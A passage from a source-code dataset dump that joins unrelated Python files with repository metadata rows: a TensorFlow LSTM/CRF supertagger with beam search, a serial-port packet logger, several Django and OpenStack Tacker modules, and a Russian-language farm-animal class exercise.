        ## 4. For beam search, we also need to memorize scores: [batch_size]
        ## 5. Backpointer (Parent indices) for predictions
        name = 'Forward'
        ## Define all the necessary weights for recursion
        lstm_weights_list = []
        for i in xrange(self.opts.num_layers):
            if i == 0:
                inputs_dim = self.inputs_dim + self.opts.lm
            else:
                inputs_dim = self.opts.units
            lstm_weights_list.append(get_lstm_weights('{}_LSTM_layer{}'.format(name, i), inputs_dim, self.opts.units, batch_size, self.hidden_prob, beam_size))
        self.add_stag_embedding_mat()
        #self.add_stag_dropout_mat(batch_size) ## unnecessary since we are only testing
        ## First Iteration has only self.batch_size configurations. For the sake of tf.scan function, calculate the first.
        first_inputs = tf.squeeze(tf.slice(forward_inputs_tensor, [0, 0, 0], [1, -1, -1]), axis=0) ## [batch_size, inputs_dim+lm]
        forward_inputs_tensor = tf.slice(forward_inputs_tensor, [1, 0, 0], [-1, -1, -1])
        prev_init = self.add_one_beam_forward(prev_init, first_inputs, lstm_weights_list, backward_embeddings, beam_size, batch_size)
        first_predictions = tf.expand_dims(prev_init[1], 0) ## [1, batch_size]
        first_scores = tf.expand_dims(prev_init[3], 0) ## [1, batch_size, 1]
        ## Now, move on to the second iteration and beyond
        initial_shape = tf.shape(forward_inputs_tensor)
        ## Tile each example beam_size times so every hypothesis sees its input.
        forward_inputs_tensor = tf.reshape(tf.tile(forward_inputs_tensor, [1, 1, beam_size]), [initial_shape[0], initial_shape[1]*beam_size, initial_shape[2]])
        ## [seq_len-1, self.batch_size, inputs_dim] -> [seq_len-1, self.batch_size*beam_size (B*b), inputs_dim]
        batch_size = initial_shape[1]*beam_size ## Bb
        all_states = tf.scan(lambda prev, x: self.add_one_beam_forward(prev, x, lstm_weights_list, backward_embeddings, beam_size, batch_size, True), forward_inputs_tensor, prev_init, back_prop=False) ## no backprop for testing reuse projection weights from the first iteration
        back_pointers = all_states[4] # [seq_len-1, batch_size]
        back_pointers = tf.transpose(back_pointers, perm=[1, 0])
        all_predictions = all_states[1] # [seq_len-1, batch_size]
        all_predictions = tf.concat([first_predictions, all_predictions], 0)
        all_predictions = tf.transpose(all_predictions, perm=[1, 0]) # [batch_size, seq_len]
        all_scores = all_states[3] # [seq_len-1, batch_size, 1]
        all_scores = tf.concat([first_scores, all_scores], 0)
        all_scores = tf.squeeze(all_scores, axis=2)
        all_scores = tf.transpose(all_scores, perm=[1, 0])
        return all_predictions, all_scores, back_pointers
    def add_one_beam_forward(self, prev_list, x, lstm_weights_list, backward_embeddings, beam_size, batch_size, post_first=False):
        """One beam-search step in the forward direction.

        prev_list is the scan state documented in add_forward_beam_path.
        On the first step (post_first=False) the state is expanded from
        batch_size to batch_size*beam_size; afterwards hypotheses are
        re-gathered via parent_indices.
        """
        ## compute one word in the forward direction
        prev_cell_hiddens = prev_list[0] ## [2, batch_size, units*num_layers]
        prev_cell_hidden_list = tf.split(prev_cell_hiddens, self.opts.num_layers, axis=2) ## [[2, batch_size, units] x num_layers]
        prev_predictions = prev_list[1] ## [batch_size]
        time_step = prev_list[2] ## 0D
        prev_scores = prev_list[3] ## [batch_size (self.batch_size*beam_size), 1]
        prev_embedding = self.add_stag_embedding(prev_predictions) ## [batch_size, inputs_dim]
        #prev_embedding = prev_embedding*self.stag_dropout_mat
        h = tf.concat([x, prev_embedding], 1) ## [batch_size, inputs_dim + lm]
        cell_hiddens = []
        for i in xrange(self.opts.num_layers):
            weights = lstm_weights_list[i]
            cell_hidden = lstm(prev_cell_hidden_list[i], h, weights, post_first) ## [2, batch_size, units]
            cell_hiddens.append(cell_hidden)
            h = tf.unstack(cell_hidden, 2, axis=0)[1] ## [batch_size, units]
        cell_hiddens = tf.concat(cell_hiddens, 2) ## [2, batch_size, units*num_layers]
        with tf.device('/cpu:0'):
            backward_h = tf.nn.embedding_lookup(backward_embeddings, time_step) ## [self.batch_size, units]
        if post_first: ## batch_size = self.batch_size*beam_size
            backward_h = tf.reshape(tf.tile(backward_h, [1, beam_size]), [batch_size, -1]) ## [batch_size, units]
        bi_h = tf.concat([h, backward_h], 1) ## [batch_size, outputs_dim]
        projected_outputs = self.add_projection(bi_h, post_first) ## [batch_size, nb_tags]
        scores, indices = self.add_top_k(projected_outputs, prev_scores, beam_size, post_first) ## [self.batch_size, beam_size], [self.batch_size, beam_size]
        ## stop_gradient: beam bookkeeping must not feed the backward pass
        scores = tf.stop_gradient(scores)
        indices = tf.stop_gradient(indices)
        predictions = indices % self.loader.nb_tags ##[b, B]
        scores = tf.reshape(scores, [-1, 1]) ## [batch_size, 1]
        predictions = tf.reshape(predictions, [-1]) ## [batch_size]
        if post_first:
            ## indices // nb_tags recovers which beam each winner came from
            parent_indices = tf.reshape(tf.range(0, batch_size, beam_size), [-1, 1]) + indices//self.loader.nb_tags ## [self.batch_size, 1] + [self.batch_size, beam_size]
            parent_indices = tf.reshape(parent_indices, [-1]) ## [self.batch_size*beam_size (batch_size)]
            cell_hiddens = tf.transpose(cell_hiddens, [1, 0, 2]) ## [batch_size, 2, units*num_layers]
            with tf.device('/cpu:0'):
                cell_hiddens = tf.nn.embedding_lookup(cell_hiddens, parent_indices) ## [batch_size, 2, units*num_layers]
            cell_hiddens = tf.transpose(cell_hiddens, [1, 0, 2]) ## [2, batch_size, units*num_layers]
        else:
            parent_indices = tf.zeros([batch_size*beam_size], tf.int32) ## Dummy parent indices for the first iteration. We know parents for the first iteration
            cell_hiddens = tf.reshape(tf.tile(cell_hiddens, [1, 1, beam_size]), [2, batch_size*beam_size, -1])
        time_step += 1
        new_state = [cell_hiddens, predictions, time_step, scores, parent_indices]
        return new_state
    def run_batch(self, session, testmode = False):
        """Run one mini-batch.

        Training mode: returns (loss, accuracy) after one optimizer step.
        Test mode, greedy (beam_size == 0): returns (loss, accuracy,
        flattened non-padding predictions). Test mode, beam: returns
        (predictions, scores) after back-tracking the beam pointers.
        """
        if not testmode:
            feed = {}
            for feat in self.inputs_placeholder_dict.keys():
                feed[self.inputs_placeholder_dict[feat]] = self.loader.inputs_train_batch[feat]
            feed[self.keep_prob] = self.opts.dropout_p
            feed[self.hidden_prob] = self.opts.hidden_p
            feed[self.input_keep_prob] = self.opts.input_dp
            train_op = self.train_op
            _, loss, accuracy = session.run([train_op, self.loss, self.accuracy], feed_dict=feed)
            return loss, accuracy
        else:
            feed = {}
            for feat in self.inputs_placeholder_dict.keys():
                feed[self.inputs_placeholder_dict[feat]] = self.loader.inputs_test_batch[feat]
            ## All dropout disabled at test time.
            feed[self.keep_prob] = 1.0
            feed[self.hidden_prob] = 1.0
            feed[self.input_keep_prob] = 1.0
            if self.beam_size == 0:
                loss, accuracy, predictions, weight = session.run([self.loss, self.accuracy, self.predictions, self.weight], feed_dict=feed)
                weight = weight.astype(bool)
                predictions = predictions[weight]
                return loss, accuracy, predictions
            else:
                predictions, scores, weight_beam, weight, back_pointers = session.run([self.predictions, self.scores, self.weight_beam, self.weight, self.back_pointers], feed_dict=feed)
                weight = weight.astype(bool)
                weight_beam = weight_beam.astype(bool)
                predictions, scores, indices = back_track(predictions, scores, back_pointers, weight_beam)
                ## predictions [batch_size, seq_len], scores [batch_size, seq_en], back_pointer [batch_size, seq_len-1]
                ## NOTE(review): Python-2 integer division below; under
                ## Python 3 `b` would be a float and reshape would fail.
                b = predictions.shape[0]/self.beam_size
                n = predictions.shape[1]
                predictions = predictions.reshape([b, -1])[:, :n]
                ## [bB, n] => [b, Bn]
                predictions = predictions[weight]
                scores = scores[weight_beam]
                return predictions, scores
    def run_epoch(self, session, testmode = False):
        """Iterate run_batch over a full pass of the data.

        Training: returns (loss, accuracy) of the last batch.
        Testing: returns overall tag accuracy against self.loader.test_gold,
        optionally writing predicted supertags to disk via test_opts.
        """
        if not testmode:
            epoch_start_time = time.time()
            next_batch = self.loader.next_batch
            epoch_incomplete = next_batch(self.batch_size)
            ## debug
            #count = 0
            while epoch_incomplete:
                #count += 1
                loss, accuracy = self.run_batch(session)
                print('{}/{}, loss {:.4f}, accuracy {:.4f}'.format(self.loader._index_in_epoch, self.loader.nb_train_samples, loss, accuracy), end = '\r')
                epoch_incomplete = next_batch(self.batch_size)
                #if count == 100 and self.opts.model in ['Stagging_Model_Global_LM']:
                #    break
            print('\nEpoch Training Time {}'.format(time.time() - epoch_start_time))
            return loss, accuracy
        elif self.beam_size == 0:
            ## Greedy decoding over the test set.
            next_test_batch = self.loader.next_test_batch
            test_incomplete = next_test_batch(self.batch_size)
            predictions = []
            while test_incomplete:
                loss, accuracy, predictions_batch = self.run_batch(session, True)
                predictions.append(predictions_batch)
                print('Testmode {}/{}, loss {}, accuracy {}'.format(self.loader._index_in_test, self.loader.nb_validation_samples, loss, accuracy), end = '\r')
                test_incomplete = next_test_batch(self.batch_size)
            predictions = np.hstack(predictions)
            if self.test_opts is not None:
                self.loader.output_stags(predictions, self.test_opts.save_tags)
#            if self.test_opts is not None:
#                if self.test_opts.save_tags:
#                    self.loader.output_stags(predictions, 'greedy_stags.txt')
            accuracy = np.mean(predictions == self.loader.test_gold)
            return accuracy
        else:
            ## Beam-search decoding over the test set.
            next_test_batch = self.loader.next_test_batch
            test_incomplete = next_test_batch(self.batch_size)
            predictions = []
            scores = []
            while test_incomplete:
                predictions_batch, scores_batch = self.run_batch(session, True)
                predictions.append(predictions_batch)
                scores.append(scores_batch)
                print('Testmode {}/{}'.format(self.loader._index_in_test, self.loader.nb_validation_samples), end = '\r')
                test_incomplete = next_test_batch(self.batch_size)
            predictions = np.hstack(predictions)
            scores = np.hstack(scores)
            if self.test_opts is not None:
                self.loader.output_stags(predictions, self.test_opts.save_tags)
#            if self.test_opts is not None:
                #if self.test_opts.save_tags:
                #    self.loader.output_stags(predictions, '{}best_stags.txt'.format(self.beam_size), self.beam_size)
                #    self.loader.output_scores(scores, '{}best_scores.txt'.format(self.beam_size), self.beam_size)
                #    #with open('{}best_scores.txt'.format(self.beam_size), 'wt') as fhand:
            accuracy = np.mean(predictions == self.loader.test_gold)
            return accuracy
    def __init__(self, opts, test_opts=None, beam_size=0):
        """Build the full tagging graph: embeddings -> (bi)LSTM -> CRF path.

        Args:
            opts: training options (dims, layer counts, dropout rates, ...).
            test_opts: optional test-time options (tag output paths, ...).
            beam_size: 0 for greedy CRF decoding; beam decoding is currently
                commented out below.
        """
        ## Notation:
        ## b: batch_size
        ## d: # units
        ## n: # tokens in the sentence
        ## B: beam_size
        self.opts = opts
        self.test_opts = test_opts
        self.loader = Dataset(opts, test_opts)
        self.batch_size = opts.batch_size
        self.beam_size = beam_size
        print('beam')
        print(beam_size)
        self.get_features()
        self.add_placeholders()
        self.inputs_dim = self.opts.embedding_dim + self.opts.suffix_dim + self.opts.cap + self.opts.num + self.opts.jk_dim + self.opts.nb_filters
        self.outputs_dim = (1+self.opts.bi)*self.opts.units
        ## Assemble per-token input features; each add_* contributes a tensor.
        inputs_list = [self.add_word_embedding()]
        if self.opts.suffix_dim > 0:
            inputs_list.append(self.add_suffix_embedding())
        if self.opts.cap:
            inputs_list.append(self.add_cap())
        if self.opts.num:
            inputs_list.append(self.add_num())
        if self.opts.jk_dim > 0:
            inputs_list.append(self.add_jackknife_embedding())
        if self.opts.chars_dim > 0:
            inputs_list.append(self.add_char_embedding())
        inputs_tensor = tf.concat(inputs_list, 2) ## [seq_len, batch_size, inputs_dim]
        forward_inputs_tensor = self.add_dropout(inputs_tensor, self.input_keep_prob)
        for i in xrange(self.opts.num_layers):
            forward_inputs_tensor = self.add_dropout(self.add_lstm(forward_inputs_tensor, i, 'Forward'), self.keep_prob) ## [seq_len, batch_size, units]
        lstm_outputs = forward_inputs_tensor
        if self.opts.bi:
            ## Backward direction: reverse time, run LSTMs, reverse back.
            backward_inputs_tensor = self.add_dropout(tf.reverse(inputs_tensor, [0]), self.input_keep_prob)
            for i in xrange(self.opts.num_layers):
                backward_inputs_tensor = self.add_dropout(self.add_lstm(backward_inputs_tensor, i, 'Backward'), self.keep_prob) ## [seq_len, batch_size, units]
            backward_inputs_tensor = tf.reverse(backward_inputs_tensor, [0])
            lstm_outputs = tf.concat([lstm_outputs, backward_inputs_tensor], 2) ## [seq_len, batch_size, outputs_dim]
        crf_inputs = tf.map_fn(lambda x: self.feed_to_crf(x), lstm_outputs) ## [seq_len, batch_size, outputs_dim] => [seq_len, batch_size, lm]
        crf_inputs = self.add_dropout(crf_inputs, self.keep_prob)
        # if beam_size > 0:
        #     self.predictions, self.scores, self.back_pointers = self.add_forward_beam_path(forward_inputs_tensor, backward_inputs_tensor, beam_size) ## [seq_len, batch_size, nb_tags]
        #     self.weight = tf.not_equal(self.inputs_placeholder_dict['words'], tf.zeros(tf.shape(self.inputs_placeholder_dict['words']), tf.int32)) # [self.batch_size, seq_len]
        #     self.weight_beam = tf.reshape(tf.tile(self.weight, [1, beam_size]), [-1, tf.shape(self.weight)[1]]) # [batch_size, seq_len]
        # else:
        self.predictions, projected_outputs = self.add_crf_path(crf_inputs) ## [seq_len, batch_size, nb_tags]
        ## weight masks padding tokens (word id 0).
        self.weight = tf.cast(tf.not_equal(self.inputs_placeholder_dict['words'], tf.zeros(tf.shape(self.inputs_placeholder_dict['words']), tf.int32)), tf.float32) ## [batch_size, seq_len]
        self.add_lm_accuracy()
        self.loss = self.add_loss_op(projected_outputs)
        self.train_op = self.add_train_op(self.loss)
        # if self.opts.bi:
| [
"jk964@grace2.grace.hpc.yale.internal"
] | jk964@grace2.grace.hpc.yale.internal |
99cf90937f26242723ce9817ba1a0ba687d0864c | 41ede4fd3bfba1bff0166bca7aee80dcf21434c6 | /tribunal2000/unknown-horizons/actions.py | 668b299c96b7013c054a25541f0038050a242f19 | [] | no_license | pisilinux/playground | a7db4b42559a21cc72fd4c8649e0231ab6a3eb3c | e4e12fff8a847ba210befc8db7e2af8556c3adf7 | refs/heads/master | 2022-08-12T23:03:27.609506 | 2022-08-11T18:28:19 | 2022-08-11T18:28:19 | 8,429,459 | 16 | 22 | null | 2022-08-11T18:28:20 | 2013-02-26T09:37:11 | Python | UTF-8 | Python | false | false | 428 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Licensed under the GNU General Public License, version 3.
# See the file http://www.gnu.org/licenses/gpl.txt
from pisi.actionsapi import pythonmodules
from pisi.actionsapi import pisitools
def build():
    """PiSi build step: byte-compile the Python sources."""
    pythonmodules.compile ()
def install():
    """PiSi install step: install the module, fix compiled .pyc paths under
    the game's data directory, and ship the README as documentation."""
    pythonmodules.install ()
    pythonmodules.fixCompiledPy("/usr/share/unknown-horizons")
    pisitools.dodoc ("README")
| [
"tribunal2000@gmail.com"
] | tribunal2000@gmail.com |
32bed2fafc640ee40636dad7d92a4522dcdd35a9 | 0d5241c847506383cc9b6302fb84bcf95f6c7350 | /tx_test.py | c711ad6e4d69584cf661c77e4146e72ea63e3499 | [] | no_license | aedra/recuperator | 80e51f2c520b8c9a55c86942f8525789bfedf5ba | 34839112d5515a04844e3dd230af57b7cec96fa9 | refs/heads/master | 2016-09-06T16:52:48.126389 | 2014-12-15T01:10:55 | 2014-12-15T01:10:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,318 | py | import serial
from datetime import datetime, date, time
import time
def check_checksum(tl):
    """Two's-complement checksum of the first six bytes of *tl* (0..255)."""
    payload_sum = sum(tl[:6])
    return (-payload_sum) & 0xFF
def tx_packet(tvalues):
    """Transmit *tvalues* over the serial port, inverting each byte first
    (the bus uses inverted logic, matching the read path's ~ord(...))."""
    for value in tvalues:
        inverted = (~value) & 0xFF
        port.write(chr(inverted))
# Main packet-logging loop (Python 2: uses `print >> f` and `print arr`).
# Reads inverted bytes from the serial port, groups them into packets by
# inter-byte gaps (> 50 ms), logs each packet, and replies to command 213.
idx = 0
arr = ['0'] # for file I/O handling
val = [0] # for calculation
cks = 0               # NOTE(review): unused below -- candidate for removal
datestr = ['0']       # NOTE(review): unused below
tempRoom = [0]*8      # NOTE(review): unused below
tempSet = [0]*8       # NOTE(review): unused below

# Canned response packet sent when a 213 header is seen.
txarr = [181, 0, 7, 130, 1, 193]

# uart clock was adjusted from 3MHz to xxx to tweak the baud rate
# 4800bps has 5200bps in real measurement
port = serial.Serial("/dev/ttyAMA0", baudrate=2400, timeout=1.0)

fo = open("packetlog-recuperator.txt","w")
print >> fo, "Date", "Time", "Byte0", "Byte1", "Byte2", "Byte3", "Byte4", "Byte5", "Byte6"
cd = datetime.now()

while True:
    # read 1byte from serial port and store it into packet array
    t0 = time.time()
    tbyte = port.read(1)
    rcv = str((~ord(tbyte))&0xFF)
    t1 = time.time()
    # A gap longer than 50 ms means the previous packet is complete.
    if t1-t0 > 0.05:
        cmdset = ' '.join(arr)
        print arr
        if len(arr) > 4:
            if arr[0]=='213':
                time.sleep(0.11)
                tx_packet(txarr)
            print >> fo, cd, cmdset
        # initialize variables
        idx = 0
        arr = ['0']
        arr[0] = rcv
        val = [0]
        val[0] = int(rcv)
        cd = datetime.now()
    # compare checksum
    # place command parsing and functions for each commands
    else:
        arr.append(rcv)
        val.append(int(rcv))
        idx +=1
# NOTE(review): unreachable -- the while True above never exits.
fo.close()
"blueskul73@gmail.com"
] | blueskul73@gmail.com |
ebb48da0afb3cc3a6e84d07dc054e6bed724ced7 | e9980c7c608d2098a6e7c4e858a5909196759f30 | /contact/forms.py | 6d2db357482691e3421e03d841a9d5f4073295a3 | [] | no_license | saurabhgharat/django-portfolio | b906b2b5fcd833cae6ba007277edd54e092d8d86 | 1e2b2d9b168932c67e85198f9f9db4cf41a21431 | refs/heads/master | 2020-03-26T17:16:37.063718 | 2018-08-17T18:09:04 | 2018-08-17T18:09:04 | 144,604,731 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 188 | py | from django import forms
from contact.models import Contact
class ContactForm(forms.ModelForm):
class Meta:
model = Contact
fields = ['name', 'sender', 'message', ]
| [
"saurabhhgharat9@gmail.com"
] | saurabhhgharat9@gmail.com |
7fe4ba0f5ad62a80601a216373746ad51ac9e09f | 2e00398c4b77ab6e1996dbbefa167e13a8ad40a9 | /products/urls.py | fab0250699fb90757ba44b5592f3d12ac5e94b7e | [] | no_license | cleliofavoccia/PurBeurre | d754b83ed28b1240447243f149080058a60ccdfb | e2b5a51fbd91412e68ddb1c3c785713c7988cc41 | refs/heads/main | 2023-03-20T11:06:32.466520 | 2021-03-12T16:02:22 | 2021-03-12T16:02:22 | 331,650,830 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 266 | py | """URLS of products app"""
from django.urls import path
from . import views
app_name = 'products'
urlpatterns = [
path('<int:pk>/', views.ProductDetailView.as_view(), name='product'),
path('results/', views.ResultsListView.as_view(), name='results')
]
| [
"favoccia.c@live.fr"
] | favoccia.c@live.fr |
85f15b7422e7ba1436915672b9b7d3691003d04d | aee26a4c731a84481a499679c3d4cef9ec954aed | /tacker/sol_refactored/objects/v2/vnfc_snapshot_info.py | 3d495eaac1a58e1b7d9459884ff6691aa47c8f26 | [
"Apache-2.0"
] | permissive | openstack/tacker | 6976cbee3afadfd9390849b56da2837feb93e912 | 9c7918f0b501cdeaffae40f585b76fc92b8e196e | refs/heads/master | 2023-09-04T01:22:43.106241 | 2023-08-31T00:06:42 | 2023-08-31T00:42:20 | 21,259,951 | 125 | 172 | Apache-2.0 | 2021-05-09T06:13:08 | 2014-06-27T01:11:56 | Python | UTF-8 | Python | false | false | 2,018 | py | # Copyright (C) 2021 Nippon Telegraph and Telephone Corporation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tacker.sol_refactored.objects import base
from tacker.sol_refactored.objects import fields
# NFV-SOL 003
# - v3.3.1 5.5.3.19 (API version: 2.0.0)
@base.TackerObjectRegistry.register
class VnfcSnapshotInfoV2(base.TackerObject, base.TackerObjectDictCompat):
    """VnfcSnapshotInfo data type (ETSI NFV-SOL 003 v3.3.1, clause 5.5.3.19,
    API version 2.0.0): snapshot metadata for a single VNFC instance."""

    # Version 1.0: Initial version
    VERSION = '1.0'

    fields = {
        'id': fields.StringField(nullable=False),
        'vnfcInstanceId': fields.StringField(nullable=False),
        'creationStartedAt': fields.DateTimeField(nullable=False),
        # Null while the snapshot is still being created.
        'creationFinishedAt': fields.DateTimeField(nullable=True),
        'vnfcResourceInfoId': fields.StringField(nullable=False),
        'computeSnapshotResource': fields.ObjectField(
            'ResourceHandle', nullable=True),
        'storageSnapshotResources': fields.ListOfObjectsField(
            'VnfcSnapshotInfoV2_StorageSnapshotResources', nullable=True),
        'userDefinedData': fields.KeyValuePairsField(nullable=True),
    }
class VnfcSnapshotInfoV2_StorageSnapshotResources(base.TackerObject,
                                                  base.TackerObjectDictCompat):
    """Inline structure of VnfcSnapshotInfoV2: maps a storage resource to
    its snapshot resource handle."""

    # Version 1.0: Initial version
    VERSION = '1.0'

    fields = {
        'storageResourceId': fields.StringField(nullable=False),
        'storageSnapshotResource': fields.ObjectField(
            'ResourceHandle', nullable=True),
    }
| [
"oda@valinux.co.jp"
] | oda@valinux.co.jp |
fbeeb69869e38fdbd9ddce6c3e146eabf4d25971 | 664274cecab7846c8787af1bb105e6a3ba706905 | /server/apps/survey/management/commands/fix_questions.py | 74d591910849c36aee8aee50f84aa77fdfdc5646 | [
"MIT"
] | permissive | Ecotrust/south-coast | 99176f6e85901c622755c5cdd1255c9e255385ae | b225bd52abfd7c907fa7f8a97a3f2273c895c140 | refs/heads/master | 2020-04-29T09:40:40.444236 | 2013-10-05T00:52:30 | 2013-10-05T00:52:30 | 13,329,657 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,253 | py | from django.core.management.base import BaseCommand, CommandError
from survey.models import Question, Option, Block, Page
class Command(BaseCommand):
    help = 'Save All Responses'

    def _add_block(self, question, block_name):
        """Attach the Block named *block_name* to the page holding *question*.

        The page is re-fetched per call, matching the original per-branch
        Page.objects.get(...) behavior.
        """
        page = Page.objects.get(questions=question)
        page.blocks.add(Block.objects.get(name=block_name))
        page.save()

    def handle(self, *args, **options):
        """Rebuild page->block links from question slugs and reset the grid
        columns of every grid question to the two fixed Options (pk 1, 2)."""
        colA = Option.objects.get(pk=1)
        colB = Option.objects.get(pk=2)

        # Start from a clean slate: drop every existing page/block link.
        for page in Page.objects.all():
            page.blocks.clear()
            page.save()

        for question in Question.objects.all():
            # Skip questions that are not attached to any page.
            if question.page_set.all().count() == 0:
                continue
            slug = question.slug
            # Gear type: 'lobster' and 'fish-traps' are more specific than a
            # plain 'traps' slug, hence the elif ordering.
            if slug.find('lobster') != -1:
                self._add_block(question, "Lobster Traps")
            elif slug.find('fish-traps') != -1:
                self._add_block(question, "Fish Traps")
            elif slug.find('traps') != -1:
                self._add_block(question, "Traps")
            if slug.find('line') != -1:
                self._add_block(question, "Line or Reel")
            if slug.find('spear') != -1 or slug.find('dive') != -1:
                self._add_block(question, "Spear or By Hand")
            if slug.find('net') != -1:
                self._add_block(question, "Nets")
            # Island: the combined slug must be tested before its substrings.
            if slug.endswith('st-thomas-st-john'):
                self._add_block(question, "St. Thomas or St. John")
            elif slug.endswith('st-croix'):
                self._add_block(question, "St. Croix")
            elif slug.endswith('st-thomas'):
                self._add_block(question, "St. Thomas")
            elif slug.endswith('st-john'):
                self._add_block(question, "St. John")
            # Grid questions get the two fixed columns instead of options.
            if question.type == 'grid':
                question.options.clear()
                question.grid_cols.add(colA)
                question.grid_cols.add(colB)
                question.save()
"eknuth@ecotrust.org"
] | eknuth@ecotrust.org |
c46fbb67ddbe507605f8b0089f0fbf1056797377 | f21560416f2b2288ccff8beafbd6fd282af97919 | /FileReading.py | 62e87787c7d2d3492f43f71337cf0fd0c483fab2 | [] | no_license | sumanbobo2204/pythonstarter | b18fc981152c16f478880f977ceea7e444e7a10a | af895c75802d258c32099d07973db141290f51aa | refs/heads/master | 2020-04-14T23:38:04.889250 | 2019-01-18T17:53:57 | 2019-01-18T17:53:57 | 164,209,690 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 363 | py | import glob, os
parent_dir = r"G:\Wedding_Pics\Taniya and Patla Potty\Wedding"
replace_string='G:\Wedding_Pics\Taniya and Patla Potty\Wedding\\'
rpl = 'DSC_'
rpl2 = '.JPG'
rpl3 = 'WG'
for img_file in glob.glob(os.path.join(parent_dir, '*.JPG')):
print(img_file.replace(replace_string, '').replace(rpl, '').replace(rpl2, '').replace(rpl3, ''))
| [
"noreply@github.com"
] | sumanbobo2204.noreply@github.com |
35f5bd01e47216d87cf160fb5e3b7c4cea456c3b | e5539ae038ab973df36848d741ce0cbd330c0214 | /schedules/templatetags/calendar_month.py | ebcefe9914a7337dd41cbae7c274e6f6b49bc68d | [
"MIT"
] | permissive | dvek/scyp | b6228578a97e797badbb987205669edf6d4ed957 | 0f70d6a9071edbf9e26b7cb3cfaea38905e192d1 | refs/heads/master | 2022-12-12T19:53:55.001276 | 2019-04-08T05:32:58 | 2019-04-08T05:32:58 | 139,801,087 | 0 | 0 | MIT | 2022-12-08T02:15:14 | 2018-07-05T05:55:31 | Python | UTF-8 | Python | false | false | 341 | py | from django import template
from django.utils import timezone
from schedules.services import get_times_from_day
from schedules.models import TimeOfDay
register = template.Library()
@register.inclusion_tag('templatetags/calendar_month.html')
def calendar_month():
    """Inclusion tag rendering templatetags/calendar_month.html.

    NOTE(review): 'variable' is always None and the print() below is debug
    residue -- consider removing both once the template is finished.
    """
    variable = None
    print(">>>>>>")
    return {'variable': variable}
| [
"denieru@gmail.com"
] | denieru@gmail.com |
627be50c44abf932ba5760b7dc86169e001916ed | 57acc8b08f3ba4d0a8ca8c5d52b817bd38624a23 | /job3.5-ClassFerma/Class_Ferma.py | ded507639188946fc9238c7d07295175a8d10684 | [] | no_license | migachevalexey/Netology | 288c473d05e2351623a0dbfe606382f0fad54a27 | 24b084680d1f5cec939c563dbc4f9abb9ac493f6 | refs/heads/master | 2021-05-07T03:18:52.529787 | 2018-02-26T13:37:24 | 2018-02-26T13:37:24 | 93,773,875 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,861 | py | #https://github.com/bobrynya/netology5
class Animal:
    """A single farm animal with a type, a name and a health state.

    States come from state_animal: 'live' -> 'sick' -> 'dead'.
    """
    state_animal = ['live', 'sick', 'dead']

    def __init__(self, type_animal, name, state=state_animal[0]):
        self.type_animal = type_animal
        self.name = name
        self.state = state  # essentially redundant for herds; kept for compatibility

    def change_state(self, n=True):
        """Change health: n=True -> the animal falls sick, n=False -> it dies.

        Bug fix: the original executed `self.state[self.state.index('sick')]
        = 'dead'` (item assignment on a str -> TypeError) and its message had
        two placeholders but only one format argument (-> IndexError).
        """
        if not n:
            self.state = self.state_animal[2]
            print('Умерла {} :-('.format(self.name))
        elif n:
            self.state = self.state_animal[1]
            print(f'Заболела {self.name}. Надо вызвать ветеринара!')

    def feed(self):
        """Print the feed appropriate for this animal's type."""
        if self.type_animal == 'рогатые':
            print('{}: корм сено'.format(self.name.title()))
        elif self.type_animal == 'водоплавающие':
            print('{}: корм зерно'.format(self.name.title()))
        else:
            print('Свиней кормим отходами')

    def walk(self, time, duration):
        """Announce a walk starting at *time* o'clock lasting *duration* hours."""
        print('Отправляем животных на прогулку в {0} {2} на {1} {2}'.format(time, duration, 'часов'))
class Animals(Animal):
    """A herd of animals of one kind.

    quant            -- number of animals in the herd
    stado_state      -- per-animal state list ('live'/'sick'/'dead')
    stado_state_vsego -- overall herd state: 'live', 'sick', 'dead' or 'mix'
    """
    # Class-level values are kept only as backward-compatible defaults;
    # real counters are per-instance (see __init__).
    quant = 0
    Animal.state_animal.append('mix')
    stado_state = []

    def __init__(self, type_animal, name, stado_state_vsego='live'):
        self.stado_state_vsego = stado_state_vsego
        # Bug fix: the original mutated the CLASS-level quant/stado_state,
        # so every herd shared one list of states.
        self.quant = 0
        self.stado_state = []
        super().__init__(type_animal, name)

    def add(self, n):
        """Add *n* healthy animals to the herd."""
        self.quant += n
        self.stado_state += [self.state] * n
        print('Добавилось {}шт {}. Теперь их в стаде {}'.format(n, self.name, self.quant))

    def kill(self, n):
        """Slaughter *n* healthy animals; they leave the farm immediately."""
        if self.quant >= n and self.stado_state.count('live') >= n:
            self.quant -= n
            for _ in range(n):
                self.stado_state.remove('live')
            # Bug fix: sick count was taken from self.state (a str, always 0);
            # it must come from the herd's state list.
            print('Пришлось убить {}шт {} :-(. Кушать хочется. '
                  'Осталось {}шт. из них болееют {}'.format(n, self.name, self.quant, self.stado_state.count('sick')))
        else:
            print('Столько({}шт) {} у нас просто нет. Их всего {}'.format(n, self.name, self.quant))

    def change_state(self, n=True, m=1):
        """n=False -> one sick animal dies; n=True -> *m* animals fall sick.

        Only a sick animal may die.
        """
        if not n and self.stado_state.count('sick') > 0:
            self.stado_state[self.stado_state.index('sick')] = self.state_animal[2]
            self.stado_state_vsego = 'mix'
            print('Умерла {} (болела бедняга), ветеринар не успел :-(. '
                  'Здоровых осталось {}, больных {}'.format(self.name, self.stado_state.count('live'), self.stado_state.count('sick')))
        elif not n and self.stado_state.count('sick') == 0:
            print(
                'Умертвить здоровое животное Нельзя, т.к. здоровое животное просто так умереть не может, а больных у нас нет!')
        elif n:  # falling sick
            # NOTE(review): assumes at least m 'live' animals remain;
            # otherwise list.index raises ValueError -- confirm intended.
            for _ in range(m):
                self.stado_state[self.stado_state.index('live')] = self.state_animal[1]
            self.stado_state_vsego = 'mix'
            print(f'Заболела {self.name} {m}шт. Итого у нас больных {self.stado_state.count(self.state_animal[1])}шт.',
                  end=' ')
